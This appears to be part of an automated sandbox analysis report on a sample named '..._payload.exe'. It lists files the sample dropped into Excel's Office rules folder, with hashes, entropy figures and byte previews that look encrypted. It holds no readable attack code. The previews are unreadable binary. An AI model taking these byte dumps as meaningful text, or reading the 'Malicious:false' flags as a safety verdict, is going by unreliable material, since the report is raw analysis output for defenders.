                                                                                                                                                                      SHA-512:A9CBC9DB7CE80AB815D8FA86F2A10A7896FBCBE8CF7C230276A572696EEC467EAB91F66A277B7B4144FB38C8D49979CA06F0D45E504224ADF8369F4010A9182D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.1....y.\.Vs.Xh...E...T.....D.<.........#*.M.OU.r....~.1...[R%ux.P......HJu?.=..2u.g<.>....Zd'.^...k...Q@..I-.|.04.Xy.D.^..w....Z....;mYdwm.W./..^A.r...nrM..j....b.^r.....E..n.k..KJGTp......Tz.\.....~.E.k.g.Y......V.!......+.w......LB..m...T....2.x.Xg.'....'..oR..@........V?.......rS..[......x.1.J....n.H..h.z......c..W...q..9...#.b..L......awd.z.5B.......O.=..B..N.....e.4+..P......B.RP~.b.R...n.?KL3....A.=F...=t....GP.h...d..Y..k.Q.....o..5$.4..!.RG...;L.g..V..Q.f.]..0".d.z..C..R.Zs.K.*a...~"K.%.l..&.Y.......r.]....j.V5..n.d..xw.j.i,..d.g|+.8..X.1.|.oi.s.3.K.aL..b . .{..d.4.${1.e...H.P.$..j.PK..".D|.h...Q:G.T]...M..w..IBf.N.jM....n....s.....O].p......~E/.......,..N./......^.LwXn....|..W...N.,....:..v..~nR...!....%.K..]...v.T....f.h......~...fJq|7u.....{..9.+a+;P.t...x.I......Y..H;.^iT...^.....G..Z..._../4l.z...G...m...*..u..T..D..........~=....~h.N...Z....f.^{'.$.%./.l....21./.xO...|....,...#)............Q;.+S....P...#..TB

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11464v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):807
                                                                                                                                                                      Entropy (8bit):7.735641284808283
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:p59g+DSlC8IcXTpe9TU+r6Oi1eXYOduLo2bD:p59g8bcXlsTU+pi8YHbD
                                                                                                                                                                      MD5:05D3D131AD25B1FAEB8628A906947D86
                                                                                                                                                                      SHA1:8F42F10C33884B8BC2CD39C669E0B651A5CDF9FF
                                                                                                                                                                      SHA-256:4B4461EDC99DE23182018936701DE3BD8D208010CD20363221E9A306736038A8
                                                                                                                                                                      SHA-512:37656CE131827DC8D89ACEDB4A49193DF6DED2114CB525A08B36C95DAC63EEF41DCEC0D6B5102A9F80C2EBBF4093BC80D43E1E7DC9023EE3C3307319E900441F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.ZW..v..y^....g.}R.m.Hd.....t.Z.j....U)...r...iU...,..e,..E......e`Y...v..lww...)[.[...E. Q.....Yf..xI.......6....0........n.k.L.CY$=...8>.Y...Xr<v...=.R.9,O.Y.AFY.<...s. .*q..n.O.l.*.$...M<.J..b..l.C........&c.."...~49?*.......1.XF...E|...e.}+q..Q*.T.7...f....U{A.;..$A-.c...".......!..Zgg.r.......m....&K.uWT....#J...A...w.q......}kL.29........x..#.?F.?.....w....[..&.....EP.M...e1du...6-..H'....N7........`.Bv...d....,..W.a........D/H.|f]M:.&,;n.....a.<....c3...U|..*.21&.#D.L...{,..R&.-O.Btg......o....zwk...K.....k.....()...Dt.WR..K....~A.o..i.x....._..'.M...+..-...i)XW&pY.=...H....lwa.....r. (.......%.8P..:$....i..f.0..:ibk~.6...[....V,....G.$c..q..m.Z ...~.....2....PE0.. .CmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11498v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):747
                                                                                                                                                                      Entropy (8bit):7.666949362066176
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:6V13N5stOX0JvEm09GMZRm0Dr1a7r8JKfsVmQkBbd06HhqYyYkO+Gx1dKdwdxFSw:6jMtOEv1EG2RmMrs7r8JZmQkD0+8fJNE
                                                                                                                                                                      MD5:43CDF276765CF92D8C36201C06CB4B0C
                                                                                                                                                                      SHA1:FAC1381ACEE69AE53764B0B44FCDA57163A51E1A
                                                                                                                                                                      SHA-256:011810D874AEC32C9D9A14597B91FA00DC4F1CEDD3048304177D16FEFF5DFB18
                                                                                                                                                                      SHA-512:FA6756FF568715AFC75E49B8E675575B546A8862B2F34E5E5EFACC558F98564CC7B3DC609E62B1E63E46107161693755CC9F9BFE9E701CF57F50F0F613F18AC7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlg...(w..~.......+.B.1{..n.[4..V....SaA....j.oU..........:T.YcT./....VX..../.....m,...;l1..j.).>...C..~.W5n>,.C.0qP...*....j].d.P...Va..]U=#x,.Z...i..... ...o.......g..Z`]k..$.X..Q.T".o./.}.tLk..Y..z.....P.v.......y.....(Ov...l.UzS..3..[+....R....2......._E.....+.?..9........!.H%T..Y.X...z...h..Jwf....V..P...Q.......F.Q.8.(.....,k.P......-.b..[...e..1z..]@k.N..s..../.F.......zXf..X...-.ET.V...oM.{wE35...uiL2._.|m....>..c.._LPj3.z.l-+e.i......;....OO9..e.n_.../..zk......@...tV.A........k3...8.|....H=h..o.j..5.9p-...cL.B.M.......+*.....m.....]....P..5......V......v.R......dT~.........:....|.].y~....r.i.Z..o..UkGGa.9..QmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11499v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1786
                                                                                                                                                                      Entropy (8bit):7.898009922716099
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:HbEyHf9lGyq3on6mOW/AFUOkihd7Woj11osLfqcjASkvd+hwmm3pKRf6o2bD:3HffGKJdyRkmDj1+wNjeM2hZKcbD
                                                                                                                                                                      MD5:7F4761040C4D9A1769DEEAA5ED0F578C
                                                                                                                                                                      SHA1:B5B20A3A55702928A1DB9292955BCFF00BEF95A7
                                                                                                                                                                      SHA-256:42EAB6F07E041D349FD43DCC46D79E961E1758D942F90046163543C28535B303
                                                                                                                                                                      SHA-512:83DB29ADA59CB6876BECDF5430E27360D8C8DD7CF01AB3DA8F471DE19F0FF14E32D26CADAFD41CB0471CAAFBC6B2CE1023DAFFD2842FB7A946E9E677A6EBEC4B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.;.S.<...W.7q..G..'2....W."..T..x1+..5V...G...~..r.@b.?,..l.f*..Z)..r..7y..*.[.A.A.7..w|6...l.:[.'....5.....i........."h.*lk5a.h..$k-.Y.Gq.^...........0.YA.h..7|.YI........B...e..7.~d5o.B....^...9.%.0..6.Q5[...*$....yz.3.9..r)@{>^.....C.6.D..4.....h0s..<.uYWE.~..w C9..OV.....66....yp.$~.1.;.g......c....9.^...V.8...L.5q.<s..ma.V....G../`..|.dEh$.X&.r..5O.WsS..o.=.|4.E...;........#..6s{.H...5.f...8..p.t.F...w..`....x9..x.._Fyc..v..Ey..,V_....E...n..Q.'....R..k.5..u0N..=S..........%....U.U.K.. ..F..;C.I..|@.z....L.d.P-.....!..............e9.....e..c..+...i.........p...XO..LTd.cm..U.9.d.$.<...0....<.p......t... .y....!......._..'`..-..A.P!....Y..R&.n.;..]l....X....;./f...T(h.S]...aU........R..R...A.rw.~./(.Y..'1.k&T]..@xm.u.H...}S(...zim@.}...4..mVY.[g=jU..%.`..aT..%C..v.f..zfS.".@...(N9..._.-.t..$k1.....4.o:......&7..j[.Lur..>...9Y.r...hf.(=..B.M.......:.t.K...:.."..D.Q.xuV.k}.z.....:q#.H%E..A.n..........r.F.4/...Y.Nd...b]I..g.. q..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11500v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):886
                                                                                                                                                                      Entropy (8bit):7.7584825938578765
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:6Me93HKlD7qFFXxqGld5Vk8c9D060122a16vV2bD:6MeZKozxLldwPDB2+pD
                                                                                                                                                                      MD5:EDF9CD53CD23C00F0106F9123765FCA0
                                                                                                                                                                      SHA1:AA8737B2FC9F22B7AC6035EC0A07C73FB6ED2681
                                                                                                                                                                      SHA-256:F7ADF2DCAB70D536A1F82C1939A04B4A995AD042192116C290750AED024DCAEB
                                                                                                                                                                      SHA-512:B708F25D155CF2FEFFF63ACDFDDF5D987CAF1ADD3AB668825A1ED299FFD9D46FE3CB4E60D58A83C2FB6001343B6456067BBEE6AFC2FDBA241619E4DBAB838008
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..S..WI.9....n=....1(.$@g8.E..tu8.N7..8L....E.G.t.m3]%...)4...$.ma.v.s.~.B...R.._.b...1.......av..#.tI.I.j?.?.s7....6mk.)..X.x"..M..R.....e......rf.C.....Vy..\.lh........&.RD.~-..t=.G...}$......a....h..P.3.G.....D..H........ns....B\.".d.&.H........<.I.....1'....n.4...=..uZ.]I..m.D.f&...."0..K.*z!k..Q..M...=.2......:t.....uh.?.)R.3....<.rq........._._.......6 .x.....<...+..r........a..D..l.2....'..O_.Y.\...>.DKX....'..9.@B...B..Ef.i....G..".`.>.kfT.`.A.^..0..@...[D.... /..+.J..T....q.U...7J.......d..._P.....I.X...p...OX...s-...HV...<..)..R.i.t.IN`...:...<.[...N..o C.%....u$(..3@..y...E.....A.in.X..u]k..a......7.......B..w..... 9...E.%.F.:.i....I:.W.H.(=.\X....d.I...-.f.L.^..AQ.T]7..j...Gw.V.H.l.M.......=......U.....Fmio..e.VT..."...c+..O.U/..HE..D.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11502v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1324
                                                                                                                                                                      Entropy (8bit):7.862983651785414
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:Xz6N3AFNaE8PaNKMNSAYbX4fTRlLckl8if+QMt00ZdoYkZnvnwzE+wXjd2bD:X2iaEQJWST4flK68i+7t/Zd7kZoozyD
                                                                                                                                                                      MD5:02FDE9E7D5EBD27335034DF4F9EF708D
                                                                                                                                                                      SHA1:2543152CCC2DFEA13E5BF7548C96BA8A57629A0A
                                                                                                                                                                      SHA-256:02A6653041265E0F022FEB366CC4CB8E071C3C19641A3D08A087C9916E9F3ACA
                                                                                                                                                                      SHA-512:D4B6D94F6AA18FB48D8FAE91AD63C2022C33E6C4D8CDE73F6C153B89319DC60E8483309D571BDAF0A7203699B691869589B5A34FCC191E38E230C71A6C37A725
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.)..KO.H.t..S..<.)b;'.....H.........IQ..Z...@`..b+.).]..p..........B..H....$..8..@.;.k....+.5..?.w*.gZ....U.X4.qR3.....1:.*.....}}..^,<.H.3.4.......zJw.P...=.N..V.6.N.....!...)|..x...:x..vLU3.._TB.......+...:.._....n.O <0..T,....D.g>c...BM]......n..G.NI..O.%'..1...._4..q.@....Y_.6...B.....f........D...f*-Usm&...x..EJ..0....V.....v^-7......S.CNM..._cFZ..w.e.s......g.VC...N}.....y.h..AD...Tz...... ...#.M.Iee.J........%L.......{Dq.+R..[3......yl....!...".......>.3nx...E.."...&.....4....>...L.E....y1..^....Qq..r......M.}:)#.....B.}/a.[.s.8.7.....0... .Y....`GZ..>..j.'..@RH..M......&....3...c...&0..jU..*..`>.c...I.y._..o....>W8Q.q.W...3T.-.&.-.$.... .\..(.9PH.@... =...........H.c.....9.5..4v.;.F...S..s*......S'.2Kt1{.,.G...t!x4.w%..h.W....l..u)....[.?...a9..%.....g.e.]..i.....D..,@....{..b..".........J...>!ME6..l....=.......kQC.5PO.x..SU...y.8..N..'.jO..;.h.5=.k .{......b.[F..~.AT;..N.]...........(W4L]..)......qe(..z2.u06...UM6]....".Y

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11504v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1435
                                                                                                                                                                      Entropy (8bit):7.851559174236532
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:kji70HrzpAJre4ogmQt4JRBYNk16rD4J6zB91ZxqdI9HjGQ5oYczGtaQ2bD:kjioHZANeNgztgo2E4JCBGdI9boYczGG
                                                                                                                                                                      MD5:6C7E3FFF4CD8DEB1BC60B146ADB1AA23
                                                                                                                                                                      SHA1:4594F99BCBD578F6907E892FD626AA9EA320A953
                                                                                                                                                                      SHA-256:3B127BEFDF0D0E69D7571097B94632162D4E77D5BE00C38249A98B5F59D4F8D8
                                                                                                                                                                      SHA-512:38B8752CC1E5E73CBDD3CFE3F7DFF203ADAB96060ABAF085DD044B84FD4E817D02C9E4236ECCFE43B982E43705190E1C346B2DBA6B1667D628416977C5FA9B6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml......~-<....U.V>.{...8....4~g.1..S.|...Y.........*)../]..._..M..r#.*.z.vs.D&...WXj..SfT..l$5....3/......\.C....8T....8.&-.P.....(i..V.gk.p.)P$...s.......e..*cl..G0..].."r.Y.@.V..>f.B.........;...c........{.....,.g.......&.;<8y!.e..22..+..Q...8.H.,.NR.0+?L.._..Q.g...o.j...5...}r....,........D.....gA..Z$.51..z....M..v.?:..g..u.....nK....%..bC...F..I.m..s.n=.M...\. ....c..o...._.n....L.......w....m....3......a[.`.p.M.%.g.F.7Y.b.T`.U....jg.......v....v.o.ta..D..?..u:m.:q.2)...zC.J.7..D=s.Hq...........z.....#..H$..x....rW_../.j^...n).M.....I.2.).8MgB../.4..Kc.......&6~.05././..!.. .......;.44....,.y..84.....u52....@.]@M3.p......C..M:.....R!l..-vE..x..L..C.@.{...<R...... E.^...S....jW. ........fqy...f8*w...y...G.]..t.....o.P....I.i..[...F.......O.s.d.s...BviL."i+.zp),..#K../.K...1[.).U.L...E.....x~k{N.o..e8*.....l....w2.T^..-......y8.....`.H1...XZj.E..T...&W ...U.p......%#....J...a....%/b..D.!g3..@.h.#..Z$.J.. .._......=.R6R^..Ax.sI...X

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11514v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):7119
                                                                                                                                                                      Entropy (8bit):7.9738131544755495
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:MTuko9LDfCn9toi3DJ8spsqSkkrnzAzoR4GHHyST1+W2PLq43Pq7uz551XpK2r6l:MuwVsprzAUR4GtTUWWLD3dzVUr4UDYy
                                                                                                                                                                      MD5:3FEEFB72F0D3F20835EF4C1757F5D1EE
                                                                                                                                                                      SHA1:35578212ADC0ABDEFEA2C8E1C280B84A3E04E99C
                                                                                                                                                                      SHA-256:4219F5AA2655B584E08917C8E2DAD1578619A256F3A3FEBFDEC1BA2C62110FF5
                                                                                                                                                                      SHA-512:A395040517CA9A92FC76CC98E3483E27183C844E41273A3A79CD0EAAB463555627A5C30BD43B66B50D869BB84C8E417C5F12AC97D9FC069EE8960291A2E0A6F8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlg...~..Q.m.....&x..F.A}*.z?......1..>..P..F..:.@V...D...U..H.Zy.....5..Rs>p...#.\c.....e...x.;?...%..(...[?s.Bb...d$.v.LT|.@...z.&.[. .41.:\...rQ. C....q...f....o.....f.....`.#.7.f.y.....%.q..0.,.H.d.I.E.s...U.[.M....@5.H..d.}...@.+y...bK.}?u..j...4,.]t.._q.,....^........`|1.P.jX.....(?.Z..=...u.....h.l.ZU. ..$$.j7....:.0......_.Q.W5F...S#...F.~.9S(.q..a}~..p..$2...#`.(J...#.=.%.TV...T...o-......g$......."h............x-..I.m7....z.m.}..f..|/^ .Rh.....>.)X.d`.t.X..6..r.D....f0_T[jA.v...}.h.YL.Ht.}eN....SdV.EE.. .!.0>......W......!..<[..{.........Kvfn.teB.ZT.Ha.C5W.p<K..6r...XQc....k...._s...]..'g......Xp...0.......qCN%.....o.=..-.M.k....@!...(...]!..i..+...e.T...(..;%...C.-...@...^RTh...<......&.N.lF.K'..AK..O.....d..../..?X..&..Q.KlEZ.Q......j.........#.9...n...o..D..%.,.`,a....0.S.d....s=...U.Jf..1]0c..~.%<L.|..=H.....[.wX9.G...y2G..c..zifM.X.z..tD..[....<.....3..T..U.-....&....jm.....]d_Mh..p..~..c;...[.....t..G...w........;

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11659v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):762
                                                                                                                                                                      Entropy (8bit):7.727391447909363
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:2bDZ9ZDBEq9s1mhHRYTmVokGUmPWZJIu2WLPAx+Gq5YU8XwaaTr29ctLSUdNciik:yDbZDWq+mhgmVo4mPWQWj2jhXwazc82X
                                                                                                                                                                      MD5:70DB036CD3B0650B5EF62EE87734AAEB
                                                                                                                                                                      SHA1:8F9A854F5017BB35EDE0FDCE4FB8ED45EB188276
                                                                                                                                                                      SHA-256:D2A91FE8DA96E0D5CF7DC03AE288259FCC9F3CE0AC87962F314D2E5FDC9738C9
                                                                                                                                                                      SHA-512:18420852692F89D464F0880B67F27AD8B19D6C886A17145B56DC22FCEAA19FDA5740E85B94FF82D644211E643D84401CDD2458EA97DCA233550D4911F81ABC70
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.4..[.<.......n.......IW..uBO...W.K>.L......|x...O...o......LJ.X.^.+. .v.....m.A.s(..(.."~.?.R.%S.@........9....fxuO!>.@....8.......T]...\.<..S..L..._e..Q...H..B..L>Q..4a.....F.d.y.3!.#...v..R*..5.'H....OJ..i........X0...5..}7.*F..v...-.I.m.q(..!k...7kb.....I|.Hmzi.?k...1F[...)....M.2ENr...V}0s...l.j.l.i.W.me.........9.D.J......f...K.H<n.S~B_.S..U..w4...u.A..S..;!.%i.......5-.0.4...}.Z..AX../.&[l.b.....+]Fs...cX..u....2..\6.......[.H=T<..(b.1*^9i7.N1.-....JP..U#......../._...w........W-.x.....f....q\...P2Y...._^..6e.qt^\..J.4b.,.}..]...8..v..d..A<.p.A.._. .....|.....^....-N.E.1.P0....2VX...w..bD.|h...#..z....~V.)N..<M...."g#..e..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11701v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1463
                                                                                                                                                                      Entropy (8bit):7.831827206589034
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:xbWzoxniZ+GXO3ADCC+vA/0zLcispQ0XOC51zKeh4sSURY1TaTG1LOrGHaQH38oG:pWGo5NDCIccishjLzK44/J1sveoD
                                                                                                                                                                      MD5:91157D87A0D3B78C7C5813D8C7990694
                                                                                                                                                                      SHA1:6279D8083FD1090D9C8EBCBD4DF6E15950F74C9C
                                                                                                                                                                      SHA-256:3D317B409B1EAF02A897EC3E3A8FF544ABB0050361B153759884C62BAF468E73
                                                                                                                                                                      SHA-512:68A250D6363252E77A1F047D910EAEBC83535F8C78902FF4869524FC42268995E83EE86A6817E54BC6B8849D7EFC70016E16EDC9F5E6B1C701452B2258FB4ED4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.....,[.s.*...9..?.C._..v......*..@..bH_....'..'...^x8...7....|..`......+gC.'\..o..j......1.:.H.@...B....g.......pt..g.j.Q?...b.......V...@}...L.l.}.etd.L.[.H^%..l...N...O.8V.7........Nc......y.F..o.@g....^n...aG.iw....."j..O.........[&o..mK.I.$b.?.E/.......<..]....&MY.^oP..&m..U..._.m.U.H...V.U8.d...I.5...}._.K.nM!.l..?.@2V.Vo.vsU........}...!..|}..l...k...eO..V:.....J.}m.{e.{..69.T.|..../..f...d..... ._K..it.Vp..3~j.{...1.J.|.|....@.....^T.)s..).q..".....H.,.Il.0J...6...{s..+Q[..A..*...o...M%.]..dC..XX...@........E..=......8."[.:j.....+.w'z5.../C..8.E....7..A.i..s.r..R...wR.L..>.6pr..eaE..........{s..G<..........eg..dW....8....U...w.G(.O....9.R\..".q1..(.5... ..@.....6.t5..;..%..5Ad...5.....t.R...'..^..i.w.....2l_......u.....L..g.7_ .:....|.. $5...iS...._j...xs.....N6B...G."...x.X..K.a...0......A..l...u9x.'...............y..&..e1.P.Q....07IKK.~*....?]K..W..$..;...U./.xH..:X..H...mv.;.!.DW..U..Q..._...!s.g..E...j.S....J...sC..x./.X...8Ab...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11705v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3505
                                                                                                                                                                      Entropy (8bit):7.952095592917696
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:JjHFCpW9B05pgrytCOhFmXjVLn/KrILB+AZKQ1huXj:JjHOW9B0538GWj/L1ZZOT
                                                                                                                                                                      MD5:169225881FB20BD02DCC1013203D1FF3
                                                                                                                                                                      SHA1:A9120CCB1A2DA32A283C5B0FA3D40AC39BE62C45
                                                                                                                                                                      SHA-256:7B23BA04CD1C3E7BD5A35E727F18BF1A87EFF50E0662A5D21A1A86B2A7C4ED7C
                                                                                                                                                                      SHA-512:B4B382331AEBB660BCA4AB9A66A7FDF9786422DAD5799919F0509C469317EEB9AA20706D11617422C0B7703D1CEE07C97C3E6FE7B0E4EF9EAE9239ACE3AF9DA5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlB.'l5.!;Qw....&L...\..2G.......g.fQ.?o.....N...P`Z.)i..4.Z..a.*.!........>...+..F`^..D.O&.!.}.pt.. 2.........AR....\...{.....%...k$"....`?...KM^.X.=`...BGP....<I..|...0..,j..g.)...N..a.@d..yU...`..,!..=.....%...`...;.B.[..Y<kR"YG.2.^!v.F.M.o8...>.....G....zW.j..D......=.....~....D'I........r.O.?UC....!t`.#Q..`..:4.~i..g.f)...pjJ6...Q..\...v...O....rpm.O.E. .Z+..%...?...S.#.C...-k......q..r.;.}6l.O..Ovh...........n.h..."O!.6.V..r..-.&4...x>{H..e.^.}2.g4....w.I.....^Pc...V.I.G7.....?.#8:W....C.........<....3..cY.&."?]s......y.:O...\.....!.J6.:i...4e............8Q.....]....X..8.iE.M..{A...dX.J\.w....1...L..v<....c".Q..J..N.1..E..p<Bp.)...0.8.,...;..[.ZA.I\*.,^j...N..X..#..n5Q.3.kv..:w.".;...[...._.-..j.)r.>)s......gi..../..Y...b.a}0...."...m.)....4.S....AA..ZX.....i.]#.U.B-o4.VB..N...3ep=.F.l.A....2&...{-,Nu.3....7..zw.hg...%........%WM:.H.&:J.W......%IoX[..=..AqX..4...&G.1..q.^U.4..,....G|I.y./..0f.w....#.m...=".....,1...w.a#DP

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11710v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965
                                                                                                                                                                      Entropy (8bit):7.776301493080743
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:NDx5KIYnaEt8EwZTy/HIkp9wHWhH+6HST2bD:hx5KJaFExokvMeZHSAD
                                                                                                                                                                      MD5:18047F7AFBF2788A768C02B453F33CD9
                                                                                                                                                                      SHA1:5810297B906019C13489F63189E50E84ECCBCE96
                                                                                                                                                                      SHA-256:AD18F3B91C65C4270F7CDD0F7DF2574C69AB994869BACFB639D5652ED2B30B2A
                                                                                                                                                                      SHA-512:62CB41939433E809755E232343AD9BCED3933B19CCD192F361372B2C621CE3CC8F0A99540BA0845F26E459ED0330139E57593968F6D4576815F404DE47D7FA6E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.......6....*..."..<..xQ..<....g....P.....s.........U.....=..j^*%1......~.K..s6+.........v..L.4....i..).R.'....c..=0.$...8'.l-..*.....H..-NHSQ..nD.=.SS........).gp_.........$......J..h.Y.......T.....}..\.X..=..OMm.6A..t.Q...`.{\h...7Y{....>.c.4=S.-&..R....3....9..).70...._u..Ob#(...A85..j.Wh.x....{{.9.i.Y..`NW.d...d.....G..m...p.:.Z`....*.=M....._..;.V.....~]..az)p..:n..q.......L.........D:.......AT;$..\.OlS^.^.E.`q...w...*..E qx......XGk..v..1..q......d..?G.....Sj.#..~..X.^.f.I.../`.s..B.V?.8.....F.lb....@>..]K.)..u...)$.j....y..?..-..{.dc.+-...k05[..B..Rg+.R5....U...I.4'..h.D.F.Tw.8..y..v..l..:.~.A.....:5..!{..^..9......I...+.......e@&.2.Y:E..M....*..='..2#.5!.-..d!..v.d...IE...^..8..}.bN....hmH.....>7.i..... ..t...=.....{ug..BS.jc.......,^@.hT.....p..a..>#.......F..jp..`1...J...v.>..x....W...5..M.YC?.S+].9..4U..z.._.V....Q.<.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11767v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):2983
                                                                                                                                                                      Entropy (8bit):7.935553911114388
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Vdd0q++hUyl09bX9b2piSn+S076cbIC7NJyCHFhClUndDp/8lD:VkOh/l4bV2USn+SfcZ7NnFhClyHI
                                                                                                                                                                      MD5:2FF0D41B9FBA836D9EA3B35376B650A0
                                                                                                                                                                      SHA1:2A70448D027A7ACA1079082CD4D58101D3266DA7
                                                                                                                                                                      SHA-256:D3D6D4B38C2994DCEB5D08D3CD35351B53B20A1A29552020658CF09B30ADB363
                                                                                                                                                                      SHA-512:EAF6AB50E11951D7BA21ABBD2E0494A76A7876CF659903B44C594DFC43F35866F00958BC2630C1200BBD3540599EA6B04C97797E943517BCD3FAE2A37619C18B
                                                                                                                                                                      Malicious:false
